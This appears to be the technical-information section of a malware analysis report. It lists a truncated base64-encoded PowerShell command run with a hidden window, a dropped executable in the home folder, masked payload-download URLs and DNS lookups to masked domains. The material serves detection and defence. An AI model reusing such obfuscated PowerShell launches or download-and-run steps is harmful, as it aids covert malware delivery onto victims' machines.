Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHcAeAB0AHoAYwBiAHUAcQB1AGEAPQAnAFQAbABoAG8AcABmAGMAZQBkAGIAZQB3ACcAOwAkAFAAawBkAGIAcQBxAGYAZgBjAG...
- %HOMEPATH%\679.exe
- %HOMEPATH%\679.exe
- http://si###bazaar.com/st0n3e/HIu3qh/
- http://z3###design.com/wp-admin/f/
- DNS ASK va######denvoitoinhahi.com
- DNS ASK bi###arati.com
- DNS ASK te####-survey.com
- DNS ASK si###bazaar.com
- DNS ASK z3###design.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHcAeAB0AHoAYwBiAHUAcQB1AGEAPQAnAFQAbABoAG8AcABmAGMAZQBkAGIAZQB3ACcAOwAkAFAAawBkAGIAcQBxAGYAZgBjAG...' (with hidden window)